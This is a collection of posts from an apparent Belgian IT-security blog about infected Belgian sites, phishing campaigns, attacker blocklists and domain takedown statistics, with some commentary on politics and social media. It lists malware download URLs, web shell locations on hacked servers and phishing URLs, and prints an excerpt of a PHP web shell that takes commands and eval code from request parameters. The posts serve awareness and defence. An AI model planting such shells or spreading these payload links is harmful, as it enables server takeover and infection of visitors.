• Web2.0 hype and elections : blablabla

    After Obama there was and is still much hype about the fact that Obama has won the elections thanks to the web. Which is pure bullshit of course. It makes the communications over such a big geographic location with such dispersed voting blocs more professional and easy but it didn't switch or make the election.

    What made the election (besides the fact that the Clinton campaign was chaotic) was in fact that in the primaries he had the best field workers on the ground everywhere and was using every internal administrative trick in the book to get every delegate he could. If you looked behind the hype you could see that during the fight with Clinton it was not about the web, it was about the very local rules about the local primaries and delegates. For those who have read also his biographies in those newspapers at the same time, he won his senate seat the same way. He is known to be a street fighter in politics with much more attention to policy and rules and dealmaking than to soundbites and speeches. Those were different, but they didn't make his victories.

    But all those things are lost after an election and only the rethoric and the drama are kept in history.

    So some journalists say that this election here will be decided by twitter and facebook and the web and the candidates are all losing time and effort on those things in the hope of getting some attention (and dream about the votes). But this is not important. For the moment it seems like "this is not an election' because it seems as nobody really cares about this election on the surface.

    The political parties have their facebook and their twitter but the number of friends on these is just absolutely ridiculuous in comparaison with the web2.0 hype.

    CD&V has a bit more than 1000 friends (the greatest party in fact)

    and Vlaams Belang who has much more leverage on the web than in the mainstream media has about 5000 friends (but many more voters)

    Facebook ? Who cares ? Just an addendum not something to lose your time on when there are a lot of other activities that can have a real impact.

    It is much more important to have a really good integrated website and extranet to keep your message and actions coordinated and professional.

    The rest are drops in the ocean. You have no idea what it will add to your popularity and what the risks are.

    It will only explode if you can make your message the center of the electoral debate. And here again, the main center of action is OFFLINE not online. Your Online success depends totally on your OFFLINE success and not vice versa. Whatever the smart marketeer wants to tell you.

    And the same goes for a lot of other stuff and products.

  • PS.be infected with malware in april

    The PS is the main party in Wallonia and one of the main contenders to deliver the premier of Belgium after the national elections

    On a page of their enormous site, one injected some links to malware downloading sites according to the Google analysis

    http://google.com/safebrowsing/diagnostic?site=ps.be/

    The sites that were injected were spy-protection12.com/, google-server02.com/, spy-protection14.com of which the second one is the main distributor of malware.

    You can follow the infections on Belgian networks according to Google badware analysis in one screen here. If you want others added, just mail me.

    You can do the test with your domain by putting the domain name or the AS:xxxx

    http://google.com/safebrowsing/diagnostic?site=

  • belsec netvibes dashboard gets a relift

    Untill now there was a bit of everything.

    Now we have only kept the tools and links to keep an eye on that have something to do with ITsecurity

    We will check those links in the coming weeks and fill in the backlog of a few hundred new resources. Those will be added.

    Other changes will be possible and probable. The work will be finished by the first of september at the latest.

    But than you will have one interface for all the online apps and interesting important links that you should have if you have something to do with security.

    The rest of the links is in diigo.com which is still open

  • let your server be used as a 'hacked' attackplatform

    another hack anotherserver interface that can be placed on hackable servers

    ""Owned by Spyn3t"

    THink some version ofthe code is here

    and the shell code is something like this

    if it is not well placed it will look like this

    http://www.divinenine.net/article.php?article_id=1

    and otherwise you have access to all data on the hacked servers, scripts to abuse and attack other servers

    http://www.campingapollo.ro/class.php

    http://www.vertigofilms.es/ccmail/index.php

    http://www.campingapollo.ro/class.php

     

     

  • some changes at my facebook page (news)

    I have added the twitterfeed for informationsecurity (about 100+ rss feeds of infosecurity twitterfeeds)

    I have added this feed from this blog to the RSS application

    If someone knows how to make interesting ITsec applications for Facebook, contact me because the available platforms made me nuts

  • twittering and blogging - senseless discussion

    There is some discussion about the number of bloggers that have changed to twittering and how sorry some feel that those bloggers have gone.

    They have not gone. They were just copy/past bloggers or just adding links withoiut much comment and found that twittering was much easier and better for them.

    So it is better that those links/small ideas bloggers have found a better tool.

    My simple links are on twitter and diigo.com now and the thoughts and facts that need more than 160 characters are here. 

    Each medium has its advantages and let us use eacht at its best advantage.

  • poor facebook environment

    while everybody is looking at the way facebook will handle the privacy crisis and how many millions of users will add themselves to the tool, it is only if you have been playing around a bit in their application environment that you understand that this is their weakest link.

    If you are used to netvibes and the simplicity of adding links, rss feeds and other stuff to your pages than you are quite astonished that they have made it so difficult in Facebook while they should have made it much more easy because of the scale of their operation.

    It is also something that you see in other pages, the number of feeds and applications is quite limited

    so facebook may be fun to poke at and to leave some discussions and some pix and stuff like that it is far too limited to be a working environment to stay around too long (the number of other things on the real internet that you will miss will be much too great if you do such a thing).

  • forgot about your normal telephone system (pabx)

    well it can get hacked - maybe it is already abused - and you don't know it (if you don't look at the bill)

    "[Private automatic branch exchange] PABX hacking and fraud... is happening more and more," Australian Federal Police (AFP) investigator Alex Tilley said at last week's AusCERT 2010 conference. "It's been around for donkey's years, but in the last few months we've seen domestically and globally a major up kick in the amount of money that's being lost through PABX hacking.

    "You go home as a system administrator at night, come in the next morning and you've got an email from a telco saying 'Hey, by the way, you just made AU$30,000 (£17,290) worth of calls to Cuba last night, is that normal?'"
    http://www.zdnet.co.uk/

    So, do you have a firewall before it ? (there are a few of them) and did you do a modem test (you would be surprised) and a penetration test (get under the bed if you don't want to know the results ?)

    oh this isn't the case in Belgium ? You believe that ?

    well, good for you and the cheap telephone shop next to you or in another country with a dialin link to your pabx.

  • Top 5 Belgian Bad hosts according to honeypot project

    Project honeypot has honeypots around the world. you can even join by adding some code to your website. It indexes all the attacks it sees and gives you the possibility to see the worst offenders in spam, dictionary attacks, commentspam or just abused mailservers with all the proof added. But even if they only have some spam in their honeypots, you can be sure that there were hundreds or thousands more that were sent from these addresses.

    These are the worst Belgian hosts with the most incidents since the honeypotproject started. It is a total for spam, dictionary attacks and so on.

    If we look at these we see that there is one Skynetinstallation, one Skynet user, One Verizon Business user and two servers in the Ukraïne using so many Belgian hosts that the honeypot thinks they are Belgian. It means that the only thing that can be done is blocking those Ukraine hosts and cleaning up the connections those Belgian posts and servers have with those installations.

    They are all known as spammers and blacklisted in some lists as such.

    Malicious IPEventTotal First Last
    213.181.48.24 | SDBad Event3,4552009-03-30 2010-05-25

    analysis  according to Robtex analysis it is a skynet server and blacklisted as spammer

     195.5.125.10 | SDBad Event1,7002007-11-05 2010-05-26

    analysis (Ukraine server with many Belgian links)

    194.78.199.165 | SDBad Event1,6232009-05-15 2010-05-25

    analysis  robtex says it is skynet user

    212.190.94.67 | SD

    analysis  phone House Belgium

     

    Bad Event1,5602009-08-24 2010-05-07
    195.5.124.250 | SDBad Event1,5372008-03-21 2010-05-26

    analysis Ukraine spammer with many links to Belgium

  • phishing attack against frenchspeaking users of paypal underway

    this is what we see if we look at the number of websites set up to get their login information

    http://antiphishing.reasonables.com/search/paypal

    586498www.dorkhumor.com/uploads/PayPal.Fr/PayPal.Fr/webscr.php?cmd=_login-ru...5/26/2010 8:41:29 AMlink..
    586493user25980.vs.easily.co.uk/www.PayPal.fr/FR/paypal.fr/fr/webscr.php?cmd...5/26/2010 8:41:29 AMlink..
    586492user25974.vs.easily.co.uk/www.ServicePayPal.fr/PayPal/connexion/PayPal...5/26/2010 8:41:29 AMlink..
    586491user25974.vs.easily.co.uk/www.PayPal.fr/FR/paypal.fr/fr/webscr.php?cmd...5/26/2010 8:41:29 AMlink..
    586490user25945.vs.easily.co.uk/img/www.PayPal.com/login/security/confirmati...5/26/2010 8:41:29 AMlink..
    586486queen.host-care.com/~vaigaimu/www2.paypal.fr/errer.htm?cmd=_error_logi...5/26/2010 8:41:29 AMlink..
  • mx links

    all virusses

    http://support.clean-mx.de/clean-mx/viruses
    http://support.clean-mx.de/clean-mx/viruses.php?response=alive

    http://support.clean-mx.de/clean-mx/phishing top 50
    http://support.clean-mx.de/clean-mx/phishing.php?response=alive
    http://support.clean-mx.de/clean-mx/phishing?scope=viruses&as=AS2508

    wijzig ASN
    http://support.clean-mx.de/clean-mx/viruses?scope=viruses&as=AS2508


    http://support.clean-mx.de/clean-mx/phishing.php?country=BE&sort=email%20asc,review%20desc&response=alive
    http://support.clean-mx.de/clean-mx/viruses.php?country=BE&sort=email%20asc,review%20desc&response=alive

    http://support.clean-mx.de/clean-mx/viruses.php?response=alive&country=BE
    http://support.clean-mx.de/clean-mx/portals.php?response=alive&country=BE
    http://support.clean-mx.de/clean-mx/phishing.php?response=alive&country=BE

  • analysis 2H2009 : .be and .eu domainextensions were the hardest hit by phishers among the big domainzones

    This is what one can conclude from this published report. Curious what the response will be.

    First I also want to make clear that more methodological data should be published together with each report (as it can change) to be fully professional. and scientific clear definitions and comparaisons between different datasets are a necessity for a good understanding. None the less, the report gives us some clear indications. And these indications can be coupled with other information.

    APWG  (Anti phishing workgroup) is the international organisation that coordinates and analyzes the fight against phishing (the stealing of logins of customers from for example banks by setting up fake login pages and sending links with so called security alerts). Their yearly reports about the state of phishing in the world is based on one of the most complete databases global databases around, thanks to the collaboration with many local and other initiatives.

    The researchers make a distinction between a phishing host and a phishing attack because a phishing host can host many attacks against the same or different institutions. It is for this reason important to bring down phishing hosts as quickly as possible. Not only to limit the number of victims but also to limit the number of attacks. As the phishing hosts may be part of a fastflux botnet it is more difficult for the botnetmaster to coordinate new more sophisticated attacks if his phishing hosts are brought down and cleaned up.

    The main conclusion of the research is that more than half of all the phishing attacks around the world in 2009 could be attributed to one group, called the Avalanche gang. They professionalized the tactics of the Storm gang by using fast flux hosting domainnames bought with registries and registrars that don't mind about security on individual infected computers around the world. In the second half of 2009 the gang had to change tactics and diminished its numbers of attacks (it was responsible for about 2/3 of all phishing attacks because each of their phishing domains hosted around 40 phishing attacks) after one of its main control centers was brought down because the criminal ISP was cut off the internet by its peers (other ISP's refused to accept traffic from that ISP or to send traffic). The effect of that action was dramatic but limited in time.

    Fastflux attacks don't use one domain one server architecture, but use domains are somthing that can be used on tens or hunderds of infected PC's or hacked servers around the world. This means that it is no use to bring down a physical server because the domainname will pop up somewhere else around the world. The only way to take down these domains is by blocking the domainname in the central DNS of the organisations responsable for the domainzone.

    In global numbers there were nearly 60.000 domains used for phishing active per year since 2008 which are bought with at  more than 300 different TLD's (but mainly with 5). They are used for about 180.000 attacks against 40 financial institutes in the second half of 2009 (or one site is used for 3 attacks in general).

    IDN attacks (in which numbers and letters are interchanged to confuse the user) are seldom used while only about 5000 to 6000 phishing domains are located on an IP address.

    The 'Avalanche gang' tested and selected several domain registrars to see how long it would take them to suspend their fastflux phishing domainnames. These domainnames were often just a series of letters and numbers that varied a little bit and were often registered in several domain extensions. We saw it here quite often with the .be and .eu domain extension. It seems that a crosscheck between domain extensions would have prevented them from doing this (if one domain is a clear phisher in one domain extension a cross check with the whois data and a screenshot could have shown up the other phishing hosts on other domain extensions - the checks could all be automated).

    Several registries have augmented their security and take-down procedures because of this attack. This was the case in general for several big registries (.biz, .info, .org, .UK) and some small ones after they were attacked (like .hn and .im).

    In April 2010 the 'Avalanche gang' seemed to have diminished its operation quite dramatically. From 12.793 attacks on 498 domains in July 2009 the 'Avalanche gang' was only responsible for 59 attacks on 59 phishing hosts in april 2010.  The real question remains the same as when the Storm spamgang disappeared. What or who next ?  There is a lot of talk about the Canadian Pharmacy spamgang nowadays.

    The report prouds itself that the lifecycle of the 'Avalanche' fastflux phishing hosts was shorter than the other phishing hosts because of the interest everyone was giving to this gang, but in other professional antiphishing literature you read that a phishing host has to be taken down in 4 hours time because most of the victims are made within 4 hours of the launch of the spam for the phishing domain.

    This is far from being the case but it is difficult to interpret the numbers because they may be influenced by some domains or ISP's or hosts that don't react very quickly, if at all. The numbers would be even more interesting if they would be cleaned from phishing hosts with criminal ISP's who advertise the fact that they don't take down any criminal website (bullet-proof hosting). Nevertheless the median time needed to bring down a phishing host is still nearly 12 hours. This is still 8 hours too long to make online phishing ineffective.  If you want to discourage online phishers, you should invest your main resources in a fast response and take-down.

    Becauise the difference between the fastflux Phishing domains from the Avalanche group and the others  is a too big difference you can't have a meaningful general inication for all the phishing domains.

    The median uptime for phishing .be domains from the 'Avalanche group' is still 10 hours which is the 6th  of the 9 domain extensions that hosted the most Avalanche phishing domains in the second half of 2009. You could also note that 3 big domain extensions (.cn, .info and .org) kept this uptime under or just above 4 hours.

    This is totally not the case for the other phishing attacks where NOT one domain extension can bring down the phishing host in the same timeframe. The best is .info with 10 hours which is 8 hours longer (a working day) to bring down a non-Avalanche gang phishing host. The .be domain needs more than 20 hours (median time) to bring down a phishing host which is the 9th slowest (out of the 10 main domain extensions with phishing hosts). The .eu is the LAST. It needs 22 hours to bring down a phishing host that is not from the Avalanche gang (and those were very few which means that it took a lot of time for most of these phishing hosts). The .eu is also the LAST one in bringing down Avalanche gang phishing domains which shows that even when it was heavily abused it didn't set up the necessary fast tracks to fend off the attackers and discourage them. As the internet is the Wild Wild West the best defence for now is to try to fend off the attacker in the hope that he will concentrate on another victim that hasn't put so much time and money in security.

    One should remember that taking down the domain name of the host is the ONLY way to deactivate a phishing host if the phishers use a botnet with fast flux botnet. With fastlux hosting the domain name is hosted on another server in another country every so many visits or minutes. THis is done by an infrastructure of DNS servers or procedures set up by the botnet and the infection software on the individual hosts or zombies. This makes it more or less impossible for law officers to bring down phishing domains by bringing down one server or infected PC. They have to take down the core to bring down the phishing domains and these are or the botnet infrastructure (or its criminal ISP) or the domainnames themselves at the root dns of the domain extension.

    This blog was active in pushing the FCCU and dns.be in bringing down a number of fast flux domains in the .be and in trying to convince them to use a fast track between them. But it is clear that a more permanent and automated system is necessary. At the time this blog said that the reputation of the domain extension .be an sich was at stake if no drastic actions were taken. What was surprising was that most of the information in the Whois (identification of the owner) seemed false or needed verification before activation.  This process can also be automated. Checking telephone numbers with countries and checking the emailadresses can be automated for example. At the time a process was put in place by which the Cyberpolice FCCU contacted the justice department based upon a standardized demand to take down a fastflux phishing domain based upon the Belgian Cybercrime law (I suppose) which was sent to DNS.BE after signature by a judge for the effective take-down (or should we say blocking) of the respective domainnames in the rootserver of the .be domainextension.

    When we look now at the numbers and the time necessary for a take-down it is clear that those efforts may have been gigantic and effective at the time but have been bypassed by those from a whole series of other domainextensions. The net effect of this is that as the other domainextensions became less interesting the .eu and .be domainextensions became increasingly more interesting. It didn’t help the .be domainextension that it is often sold together with the .eu domainextension and that the main crimegangs online had already some experience with the .be domainextension from the period in which they could try it totally free for a year. As this blogger at the time discovered, this campaign was abused by international crimegangs to infiltrate the Belgian webspace. If such a campaign were to be relaunched today the effects would be even more disastrous because the online crimeworld is much better organized and experienced than ever before, thanks to all the money they have amazed during the last years.

    If you look at the numbers of the phishing domains for each of the main domain extensions that were used by phishers worldwide in the second half of 2009 you will see clearly that the .be and .eu domain extension were at that time the favourites from criminals. There are practical reasons for that. You don't need to live in Belgium to be a .be domain name and the registration is quasi automated without many controls. Your domain name can be immediately activated which leaves you - in a weekend for example easily the opportunity to launch a phishing campaign (without being downed in 4 hours). And even during working days it would take more or less 10 hours to take them down.

    When we analyze the numbers we can conclude the following for the .be domain (the numbers are even worse for the .eu domain extension).

    For all the domain extensions of the world the .be domainextion was in the second half of 2009 with 297 unique .be phishing domains the 6th domainextension in the world based upon the total number of unique registered domainnames used solely for phishing and of these 287 were registered by the Avalanche gang which makes the .be domainextension the 4th of all domainextensions worldwide that were used by that gang.

    These .be domains were used by the Avalanche gang for 915 attacks against the users of 40 financial institutions. This means that the .be Belgium domainspace was the 9th worldwide in the number of such attacks by the Avalanche gang. I am not sure that we should be proud about that.

    I know dns.be will say that even these numbers are very limited as a percentage (we had nearly 1 million .be domainnames at that time) but APWG states clearly that independently of the number of domains a domain extention has, they should be very alarmed if more than 2.9% of those are used for phishing. For the .be domain it is about 3.1%  Icann has also issued several alarms in 2009 and has tried to help several registrars to stop the infiltration. Several domainextensions have taken drastic actions in 2009 and 2010 (.ru, .hk and .cn) to stop the flood of registrering domainnames for malicious use. It is time for .be to take appropriate actions in their marketplace if it doesn’t want to be seen as a dangerous domain by firewalls (blocking now on domainextension and geography) and malware reputationtools.

    In that respect one can say that .be has passed the 1 million domains but that makes the problem only worse. If we exclude all the smaller domains and only take the  domain extensions into account with more than nearly a million domains than the .EU and .be domainextensions were the most used as a percentage by the phishers. It means that if you want to play in the garden of the big boys that you will have to change the way you are doing things and you will have take on new responsabilities and will have to invest enough to keep the domain extension safe.

    When you have that many users and investors you are morally obliged to invest much more in security and make it an obligation throughout your organisation and operation, even if some people and vested interests didn’t make the mental switch yet. It is not possible anymore to block a domain extension with one million domains but the loss would be enourmous if that would become more and more the case, if more and more enterprises and networks all over the world start asking, do we need websites from Belgium if all that malware and phishing starts spreading over its domains ?  For 95% of the internet the .be domains are not necessary and most of the important .be domains have also bought other domainextensions and can switch their main focus easily.

    And what would it take. Look at the numbers. We are looking at a total of nearly 300 domains in 6 months, which means generally bout 50 each month or nearly two take-downs from the central dns server a day. And this even ain’t true because those domains are registered in small packages that are even not so difficult to spot in the registrationdatabase (for insiders).  With backup and so on, you would in fact need two to three take-down officers who follow up all the incoming demands and forward the complaints to the CERT for control if not enough proof is added or the FCCU if it comes from certificed security sources. It is not that these securityresearchers wouldn’t be willing to work together with official resources to take down these sites immediately as long as they see an immediate effect.

    So you have the 1 million domains, you have a new direction and now it is time to show that you are ready to make from the .be domain extension a domain extension where it is “safe to .be”(copyright)

     

  • worst RFI attackers for May - blocklist

    Hostname, CNAME or Alias (more INFO)
    First Offensive Action (GMT)Last Offensive Action (GMT)In Offensive State ForQuality of Administration
    www.creationsbycallie.com
    box309.bluehost.com
    14/Jun/2009 08:06:3014/Dec/2009 04:42:38183 days
    Deadly-Terrible
    raydeng.com.tw
    c2.f8.354a.static.theplanet.com
    04/Apr/2010 02:16:0005/May/2010 05:09:4531 daysStill active in RFI attacks!
    martlume.com
    server219.webhostingpad.com
    27/Mar/2009 00:55:2204/May/2010 09:10:01403 daysStill active in RFI attacks!
    host67.hrwebservices.net
    19/Apr/2010 08:44:0004/May/2010 11:32:5815 daysStill active in RFI attacks!
    host278.hostmonster.com
    www.thetravelgig.com
    03/May/2010 17:25:5303/May/2010 17:27:210 daysStill active in RFI attacks!
    3a.90.84ae.static.theplanet.com
    tiyoavianto.com
    03/May/2010 13:50:4803/May/2010 16:47:570 daysStill active in RFI attacks!
    slipgatecentral.com
    mogsoft.com
    03/May/2010 16:38:5203/May/2010 16:38:520 daysStill active in RFI attacks!
    aa.a9.5446.static.theplanet.com
    enniskillengaa.com
    03/May/2010 21:08:2704/May/2010 04:00:420 daysStill active in RFI attacks!
    www.cricermenate.it
    webx83.aruba.it
    16/May/2009 13:58:3005/May/2010 04:53:35354 daysStill active in RFI attacks!
    alexis.root-the.net
    root-the.net
    03/May/2010 08:51:2803/May/2010 08:54:390 daysStill active in RFI attacks!
    www.ux9.com.br
    node.cluster01server.com
    02/Dec/2008 13:35:2005/May/2010 03:11:20519 daysStill active in RFI attacks!
    fatink.net
    zanzibar.heritagewebdesign.com
    04/May/2010 17:02:2605/May/2010 04:53:350 daysStill active in RFI attacks!
    www.lamourencouleurs.fr
    cestdifferent.fr
    28/Mar/2010 18:30:2530/Apr/2010 11:15:5333 days
    Deadly-Terrible
    www.european-fair-trade-association.org
    217.19.238.132.static.hosted.by.combell.com
    03/May/2010 22:31:5203/May/2010 22:31:520 daysStill active in RFI attacks!
    immersiva.com
    cl13.justhost.com
    02/Jul/2009 13:04:3704/May/2010 12:06:41306 daysStill active in RFI attacks!
    zhivagobank.ru
    www.zhivagobank.ru
    27/Apr/2010 03:22:1203/May/2010 07:08:186 daysStill active in RFI attacks!
    www.pokefun4u.com
    box493.bluehost.com
    16/May/2009 15:33:0418/Nov/2009 12:41:40186 days
    Deadly-Terrible
    host72.maxim.net
    bbworlds.com
    02/May/2010 18:46:2302/May/2010 18:46:470 daysStill active in RFI attacks!
    gbox.hobby-site.com
    82-168-180-126.ip.telfort.nl
    04/May/2010 22:03:3904/May/2010 23:43:500 daysStill active in RFI attacks!
    valleyforge.networkredux.net
    www.cornerstonelearninggroup.net
    02/May/2010 14:41:3602/May/2010 14:47:310 daysStill active in RFI attacks!
    s23.coowo.com
    www.sehoworld.com.tw
    02/May/2010 11:47:3602/May/2010 11:47:440 daysStill active in RFI attacks!
    wadawww.info
    03/May/2010 11:42:4004/May/2010 10:06:401 daysStill active in RFI attacks!
    www.benibouayach.com
    02/May/2010 04:29:5304/May/2010 03:48:162 days

  • Belgian RFI infected sites

    We have found some listings of RFI infected sites and we these are Belgian offenders

    www.sitealacarte.be

    the consequence for the site is that it is already being blocked by a number of automatic antimalware engines.

     

  • something more about the RFI attack (still active)

    Remote File Inclusion (RFI) is a type of vulnerability most often found on websites, it allows an attacker to include a remote file usually through a script on the web server. The vulnerability occurs due to the use of user supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:

    • Code execution on the web server
    • Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS).
    • Denial of Service (DoS)
    • Data Theft/Manipulation

    http://en.wikipedia.org/wiki/Remote_File_Inclusion

    Now if you don't find that serious, what will ?

    It means that all the sites that are being RFI infected and are being used for stupid things like making for example searches against other sites, can be abused for other stuff as well.

    more resources updated through the twitter channel

     

  • .be sites that distribute all kinds of trojans

    http://charlepoeng.be/.w44ete/?getexe=loader.exe

    http://sporthal.msolutions.be/.l5gp3/?getexe=loader.exe

    http://www.cerclewalloncouillet.be/.s6ta/?getexe=loader.exe

    http://boardrevolutionmt2.com/ActiveX.exe

    http://fashionaarschot.be/images/idv6.txt???

    http://themixproject.be/wwwberthendrixbe/httphp???

    http://www.parfumshop.be/xmlrpc/Itoken-3.8.2.exe  (dangerous banking trojan only detected by 2 antiviruses coming from Brazil)

    http://lottoladiescycling.be/.gdj88s/?getexe=p.exe

    To clean up this stuff, find all the contact info here RSS

  • see the online php defacing tool

     

    1. SysCom]  THE SCRIPT

      13 okt 2009 - <a href="mailto:revengans@gmail.com">?</a></font><br> <font size=2>by r3v3ng4ns - revengans@gmail.com </font> </b></div></td></tr> ...
      www.sysecom.com.ar/v3/view_doc.php?view_doc=6 - In cache 
    2. Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com

      20 feb 2010 - Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com.
      gablesguesthousebnb.co.uk/56.dat - In cache (only his name is here now)
    3. Defacing Tool Pro v1.9.3 keep it priv8! ] ? by r3v3ng4ns ...

      25 april 2010 - Defacing Tool Pro v1.9.3 keep it priv8! ] ? by r3v3ng4ns - revengans@gmail.com. sysname: Linux. nodename: srv108.hostingenchile.cl. release: 2.6.18-164. ...
      www.prefser.cl/imagenes/pro.php - In cache  ANd this is what it looks like
    bo07
  • european-fair-trade-association.org infects its visitors with trojans

    They are infected with a page with php script that tries to infect an user and goes past all the Firefox defenses and is luckily stopped by my antivirus.

    Local SettingsApplication DataMozillaFirefoxProfilesuc9yqsk8.defaultCacheEEAA43FFd01

    The naming is a generic so it can be that this specific infection is a bit specific, the code is copied and published (follow diigo or twitter accounts for mailforlen) so you can analyze it

    It is not stopped by a number of network protectionlevels....

    the same script is also placed here

    Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com

    20 feb 2010 - Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com.
    gablesguesthousebnb.co.uk/56.dat - In cache

    1. Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com

      5 april 2010 - Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com.
      truknowledge.com/20.dat?a - In cache
    2. Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com se for ...

      19 maart 2010 - Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com se for modificar o codigo, por favor, mantenha o nome de seus autores originais e por favor, ...
      aiurea123.go.ro/cmd.txt - In cache
    3. Hosted On psend.com */ /* header */ <!-- Defacing Tool 2.0 by 

      17 okt 2009 - Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com se for modificar o codigo, por favor, mantenha o nome de seus autores originais e por favor, ...
      www.psend.com/users/jhonnys/tool25.txt 

    and as you see GOOGLE DOES NOT WARN you

     

    This is part of the code

    <!--
    Defacing Tool 2.0 by r3v3ng4ns
    revengans@gmail.com
    se for modificar o codigo, por favor, mantenha o nome de seus autores originais
    e por favor, entre em contato comigo...

    ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script,
    n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!!
    -->
    <?php

    //The Rules
    include("therules25.txt");

    if(empty($chdir)) $chdir = @$_GET['chdir'];
    if(empty($chdir)) $chdir = @$_REQUEST['chdir'];
    if(empty($cmd)) $cmd = @$_GET['cmd'];
    if(empty($cmd)) $cmd = @$_REQUEST['cmd'];
    if(empty($fu)) $fu = @$_GET['fu'];
    if(empty($fu)) $fu = @$_REQUEST['fu'];
    if(empty($list)) $list = @$_GET['list'];
    if(empty($list)) $list = @$_REQUEST['list'];
    if(empty($eval)) $eval = @$_GET['eval'];
    if(empty($eval)) $eval = @$_REQUEST['eval'];
    if(empty($evalcode)) $evalcode = @$_POST['evalcode'];
    if(empty($evalcode)) $evalcode = @$_GET['evalcode'];
    if(empty($evalcode)) $evalcode = @$_REQUEST['evalcode'];
    if(empty($evalfile)) $evalfile = @$_GET['evalfile'];
    if(empty($evalfile)) $evalfile = @$_REQUEST['evalfile'];

    $cmd = stripslashes(trim($cmd));

  • if you publish your code online like photo.com you have a problem

    One of the domains that are frequently listed for the moment in the database of Mx is photo.com which seems to be a Belgian operation. THe problem is 'unknown html' and the main reason why they are in this database is because some html and other code has been published openly for all to see - and who knows to analyse and abuse.

    If you know that photo.com is also a big online photo development company with many users who pay by creditcards, you would understand the dangers

    The other danger off course is a business or reputation problem because some installation will use their listing to block them because of insecurity risks.

    http://ch.foto.com/js/scripts.js?t=200912151800

    has code like this online for all to see (an interesting pop up code for phishers)

    function calcul(url,nom) {
    window.open(url,nom,'width=542,height=630,scrollbars=yes,resizable=no,top=0,left=10');
    }

    function condi(url) {
    var lalargeur = 410 ;
    var lahauteur = 400 ;
    var yes = 1;
    var no = 0;
    var menubar = no;
    var scrollbars = yes;
    var locationbar = no;
    var directories = no;
    var resizable = no;
    var statusbar = no;
    var toolbar = no;
    var t = (screen.height-lahauteur)/2 ;
    var l = (screen.width-lalargeur)/2 ;

    propriete = "width=" + (lalargeur) + ",height=" + (lahauteur) + ",top=" + t +",left=" + l ;
    propriete += (menubar ? ",menubars" : "") + (scrollbars ? ",scrollbars" : "")
     + (locationbar ? ",location" : "") + (directories ? ",directories" : "") + (resizable ? ",resizable" : "")
     + (statusbar ? ",status" : "") + (toolbar ? ",toolbar" : "") ;

    popup = window.open(url, 'TITRE',propriete) ;
    }

    function cond(url,nom) {
    window.open(url,nom,'width=410,height=400,scrollbars=yes,resizable=no,top=0,left=25');
  • Your mailinglistprovider.com used for spam

     

    It looks modern to have cloudbased services somewhere out there which are being used by thousands of people

    untill one uses it for spam and the whole service can be blacklisted

    http://support.clean-mx.de/clean-mx/phishing.php?response=alive&country=BE

    783138 
    2010-05-19 22:20:20  Lookup evidence in Phishtank  981129Lookup screenshot from Phishtank upNo previous evidence recordedSaved  evidence (233 Bytes) of last contact as txt May 20 2010 17:00:00 CEST. aliveSaved  log of last contact as txt May 20 2010 17:00:00 CEST.Lookup screenshot from cleanmx as of May 20 2010 14:22:29 CEST.

     

    SenderBaselookup 78.41.65.4 at Rus CERT university stuttgart germanylookup 78.41.65.4 at Ripe 78.41.65.4possible lookup  in maliciousnetworks.org (FIRE: FInding RoguE  Networks) pagepossible lookup in google safebrowsing pagefollow up  this AS (AS8368) as RSS-Feed AS8368SenderBaselookup 78.41.65.4 at Rus CERT university stuttgart germanylookup 78.41.65.4 at Ripe 78.41.65.4 ymlp93.comSafe  Virus-Viewer and Analyser may take a minute to complete http://t.ymlp93.com/maxameqatamhumarauhs ...
     abuse@benesol.be78.41.65.31 YOURMAILINGLISTPROVIDER